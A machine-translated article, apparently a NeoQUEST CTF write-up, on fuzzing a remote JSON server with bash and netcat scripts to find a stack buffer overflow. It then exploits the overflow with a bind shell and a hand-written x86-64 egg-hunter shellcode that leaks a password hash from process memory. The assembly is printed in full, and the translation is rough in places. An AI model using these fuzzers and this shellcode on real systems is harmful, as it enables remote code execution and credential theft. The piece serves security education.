Search for vulnerability using fuzzing and shellcode development for its operation.

To search for vulnerabilities all means are good, but what is good with fuzzing ? The answer is simple: in that it provides an opportunity to check how a program behaves, receiving information that is known to be incorrect (and often even random), which are not always included in many developer tests.

Incorrect termination of the program during the fuzzing suggests that there is a vulnerability.

In this article we:
')

demonstrate how to fuzz a JSON request handler;
using fuzzing, find the buffer overflow vulnerability;
We'll write the shellcode in Assembler to exploit the found vulnerability.

We will analyze on the example of the initial data the tasks of the past NeoQUEST . A 64-bit Linux server is known to handle JSON requests that end with a null terminator (a character with a code of 0). To get the key, you need to send a request with the correct password, while there is no access to the source codes and the binary of the server process, only the IP address and port are given. The legend to the task also indicated that the MD5 hash of the correct password is contained somewhere in the process memory after the following 5 characters: “hash:”. And in order to remove the password from the process memory, the possibility of remote code execution is necessary.

"Feel" port

We try connection to the specified address and port. To do this, we use the well-known netcat utility - the “Swiss knife” for working with the network. Do not forget about the terminating null terminator in the query:

By the nature of the received response, we understand what input the server process expects. It really handles bare JSON requests without headers or other extraneous characters. Let's specify which JSON requests the server considers valid from the syntax point of view:

Judging by these server responses, it recognizes integers as values, but does not recognize boolean values.

These server responses indicate that it recognizes non-empty arrays as values.

The server recognizes associative arrays nested in each other and ordinary arrays, but, again, non-empty.

If the request format is correctly recognized, the server checks for the presence of the “pass” tag in the main associative array:

If there is such a tag, its value is checked and, apparently, its hash is checked against the value in memory.

How to get the correct password value? You can try a simple brute force field with a password in the requests. However, such a primitive attack did not produce results.

Well, let's try to search for a vulnerability in the request handler, the exploitation of which will allow to execute the necessary shellcode and get the password hash.

Use fuzzing!

The only source of information is server responses to our requests. In the absence of a binary code and source codes, we use fuzzing. In more detail about the approach to testing we read here and there , and we learn that there are two main fuzzing methods:

Data generation
Data mutation.

You can generate random data (this approach is often called dumb-fuzzing) or input data generated in accordance with the models (smart fuzzing). Mutation provides a modification of existing input data.

We will use data generation and iterate through all potential bottlenecks of the JSON format to find input requests for which the server’s response differs from the usual one.

We will conduct the check in several stages:

Replacing service characters of a valid request with incorrect ones.
Let's make a big level of nesting of objects and JSON lists into each other.
We will form queries in which something is “many” (long strings in keys and values, objects with a large number of key-value pairs, long lists).

1. Replacing service characters of a valid request with incorrect ones

Service characters - brackets, commas, colon, delimiters (spaces). Due to this, the structure of the correct query will be violated in different places. An example of such a fuzzer:

#!/bin/bash #correct query base='{"example" : {"innerobj" : "someval"}, "example" : 777777777, "example" : [1, [2, {"inlist" : "val"}], 3], "end" : "543"}' ad1='Access Denied, pass tag not found in JSON..' ad2='Exit code = 0' if1='Incorrect data format! Check your JSON syntax.' if2='Exit code = 1' #what we must replace in correct base query declare -a checkable_syms=('[' ']' '{' '}' ' ' ':' ',') #bad substitution symbols to replace with declare -a arr=(" " "]" "{" "[[" "}}" ":" "," "A" "1" ";") echo "Fuzzing maintenance symbols.." for symbol in "${checkable_syms[@]}" do #how manu occurencies of symbol in base string? num=$(($(echo $base | awk "BEGIN{FS=\"[$symbol]\"} {print NF}") - 1)) #check every position of symbol for i in $(seq 1 $num) do #trying all of the "bad" substitutions for bad_sym in "${arr[@]}" do #dont bring if [[ "$bad_sym" != "$symbol" ]]; then #constructing the query to server resp=`echo -e "$base\x00" | sed "s/[$symbol]/$bad_sym/$i" | nc 213.170.91.86 8887` #checking the answer, if not standart, something happened [[ (("$resp" =~ "$if1" && "$resp" =~ "$if2")) || (("$resp" =~ "$ad1" && "$resp" =~ "$ad2")) ]] || echo $resp fi done done done

Such a test did not give results. So, we will check other cases.

2. Check for a large nesting level of objects and JSON lists in each other

An example of a fuzzer to test:

 #!/bin/bash #how many nested objects N=1024 base='"{\"example\" : "' final='"{\"innerobj\" : \"someval\"}"' ad1='Access Denied, pass tag not found in JSON..' ad2='Exit code = 0' if1='Incorrect data format! Check your JSON syntax.' if2='Exit code = 1' echo "Fuzzing nested objects.." for i in $(seq 1 $N) do #constructing the query to server with nested object que="$base*$i + $final + \"}\"*$i + \"\x00\"" pyt="print($que);" resp=`python -c "$pyt" | nc 213.170.91.86 8887` #checking the answer, if not standart, something happened [[ (("$resp" =~ "$ad1" && "$resp" =~ "$ad2")) ]] || echo $resp Done

Again the server correctly processes all requests. Similarly, lists of large nesting are checked. Their server also handles correctly. We will check on!

3. Check for requests in which something is “many”

Check long strings in keys and values, objects with a large number of key-value pairs, long lists.

 #!/bin/bash #how many nested objects N=2048 base1='{\"example' letter='A' final1='\": \"example\"}' base2='{\"example\" : \"example' final2='\"}' ad1='Access Denied, pass tag not found in JSON..' ad2='Exit code = 0' if1='Incorrect data format! Check your JSON syntax.' if2='Exit code = 1' flag=0 echo "Fuzzing long strings.." for i in $(seq 1 $N) do #checking long string key or value if [[ "$flag" == 0 ]]; then base=$base1 final=$final1 flag=1 else base=$base2 final=$final2 flag=0 fi que="\"$base\" + (\"$letter\")*$i + \"$final\" + \"\x00\"" pyt="print($que);" resp=`python -c "$pyt" | nc 213.170.91.86 8887` #checking the answer, if not standart, something happened [[ (("$resp" =~ "$ad1" && "$resp" =~ "$ad2")) ]] || echo $resp done

As you can see, long lines are handled normally. Long listings too. What about long objects?

Example of fuzzer:

 #!/bin/bash #how many pairs in resulting object N=260 head='{' block='\"example\" : \"val\", ' final='\"last\" : \"block\"}' ad1='Access Denied, pass tag not found in JSON..' ad2='Exit code = 0' if1='Incorrect data format! Check your JSON syntax.' if2='Exit code = 1' echo "Fuzzing long objects.." for i in $(seq 1 $N) do #constructing long object que="\"$head\" + (\"$block\")*$i + \"$final\" + \"\x00\"" pyt="print($que);" resp=`python -c "$pyt" | nc 213.170.91.86 8887` #checking the answer, if not standart, something happened [[ (("$resp" =~ "$if1" && "$resp" =~ "$if2")) || (("$resp" =~ "$ad1" && "$resp" =~ "$ad2")) ]] || echo $resp done

Here it is! If the object is long enough, the server response is incomplete - no exit code is issued to the user This starts to occur when the object contains more than 257 key-value pairs. If we make their number even more, we will see that the answer does not come at all:

Apparently, we have a classic buffer overflow. When parsing an input request, key-value pairs are placed in a constant buffer on the stack without first checking their number in the request.

At the same time, if the number of pairs lies in the range from 257 to 281, the return address is triturated from the request handler function, and if there are more than 281, some local variables are probably rewritten beyond the return address. This leads to the fact that the first part of the error message does not reach the user.

Vulnerability found!

Exploiting the vulnerability

To complete the task and get the coveted token, you need to understand how the return address is ground. It is logical to assume that the lines themselves (the keys and values of the object in the request), but pointers to them, are sequentially added to the stack. If so, you can not worry about the placement of shellcode in the memory and transfer of control to it. ASLR also in this case ceases to be a hindrance.

DEP can badly ruin our lives, because memory for lines is allocated in a heap. But let's not rush to conclusions and test our ideas in practice. To do this, we take some verification shellcode for our platform in order to understand whether the heap memory is running on the server process?

To do this, take an ordinary bindshell on port 4444 from here :

Since we have no information about the exact size of the buffer, the presence of other local variables, memory alignment on the stack, etc., it is necessary to place the shellcode a bit with a margin. Place it in four values for pairs after 256 preceding them:

Hooray, everything works! The memory with the shellcode is executable, and the return address from the request handler function is overwritten by the pointer to the line with the shellcode automatically. We have a remote shell on the server. Let's try to develop success and get access to the binary code JSON-processor:

Alas, not enough rights to do anything worthwhile. It seems that the server handler binary is encrypted, and without this password you cannot access the binary code.

We write the shellcode and get the token

Despair early. Recall that in this case our goal is not a binary as such, but a value in the memory of the process / neoquest / vuln.

Knowing that the binary file is encrypted, and that bindshell replaces the current server process in memory with the bash process, let's go another way. Let's write your egg hunt shellcode , which will find the desired value in the process's memory according to the well-known prefix (“hash:”) and give it to the user.

A variant of our shellcode (long!) Under the spoiler:

Shellcode

 xor eax,eax xor ebx,ebx xor edx,edx ;socket create syscall mov al,0x1 mov esi,eax inc al mov edi,eax mov dl,0x6 mov al,0x29 syscall ;store the server sock xchg ebx,eax ;bind on port 4444 syscall xor rax,rax push rax push 0x5c110102 mov [rsp+1],al mov rsi,rsp mov dl,0x10 mov edi,ebx mov al,0x31 syscall ;listen syscall mov al,0x5 mov esi,eax mov edi,ebx mov al,0x32 syscall ;accept connection syscall xor edx,edx xor esi,esi mov edi,ebx mov al,0x2b syscall ;store socket mov edi,eax ;dup2 syscalls - for printing result to client xor rax,rax mov esi,eax mov al,0x21 syscall inc al mov esi,eax mov al,0x21 syscall inc al mov esi,eax mov al,0x21 syscall ;egg hunter xor rsi, rsi ; Some prep junk. xor rdi, rdi xor rbx, rbx add bl, 5 go_end_of_page: or di, 0x0fff ; We align with a page size of 0x1000 next_byte: mov cx, di cmp cl, 0xff ; next byte offset jne cmps inc rdi push 21 pop rax ; We load access() in RAX ; push rdx ; pop rdi mov rdx, rdi add rdi, rbx ; We need to be sure our 5 byte egg check does not span across 2 pages syscall ; syscall to access() cmp al, 0xf2 ; Checks for EFAULT. EFAULT indicates bad page access. je go_end_of_page jmp cmps2 cmps: inc rdi cmps2: cmp [rdi - 4] , dword 0x3a687361 ;ash: letters jne next_byte cmp [rdi - 5] , dword 0x68736168 ;hash letters jne next_byte after: ;printf 32 byte of MD5-hash xor rax, rax add rax, 1 mov rsi, rdi xor rdi, rdi add rdi, 1 xor rdx, rdx mov dl, 0x20 ; Size of syscall ;exit syscall xor rax, rax add rax, 0x3b xor rdi, rdi syscall

What this shellcode does:

Creates a socket, bolts to the desired port (bind 4444), waits for a connection (listen).
Accepts a connection, saves a client socket for later use (accept).
It copies STDIN, STDOUT, STDERR descriptors to the client socket for issuing the result (dup2).
Bypasses the memory page by page (4Kb). If the address is mapped into the address space of the process, we move along the page in search of the 5-character prefix "hash:". If the address is not displayed, go to the next page. Address verification is performed by access call system.
The found address is used for output to the client socket 32 bytes of memory after it - there must be the required password hash (system call write).
Exits work.

Shellcode was written, now let's test our solution:

It worked! When connecting to port 4444, we see the required 32 characters of the password hash. It remains to get the password. Use Google:

Required password: ABAB865A15B15538D81C066574449597. It remains to get the coveted token:

Searched token: 795944475660c18d83551b51a568baba

Advantages and disadvantages of fuzzing

A wide variety of possible entry points (a text string entered via GUI, binary data from a file, the value of a network request field) and application under test (you can fuzz files, protocols, drivers, web applications, sources ...) makes fuzzing a rather effective approach to troubleshooting code security issues.

In this article, we demonstrated a fairly simple example of fuzzing, in which the mutation of the generated test data was minimized, but modern fuzzers ( Peach , Sulley , HotFuzz, and others) have much richer functionality, implementing many mutation algorithms.

However, the approach to testing with the fuzzing method has a quite obvious disadvantage: since the fuzzer does not have knowledge of the internal structure of the program being tested, you will have to search through a huge number of test data options to look for security issues. And this, in turn, requires considerable time.

And on NeoQUEST-2017 - even more interesting tasks!

While practicing the NeoQUEST missions, you can always learn something new and understand how certain security mechanisms work in practice. In this article, we told about fuzzing, demonstrated how to detect the buffer overflow vulnerability by this method, and wrote the shellcode for the found vulnerability in Assembler. At the same time, we executed our code without even having a binary program vulnerable. This is a clear demonstration of what might be if the server is poorly implemented.

In the tasks NeoQUEST-2017, which will be held from March 1 to 10, undoubtedly, there will also be something to learn, so feel free to register !

Source: https://habr.com/ru/post/321912/

All Articles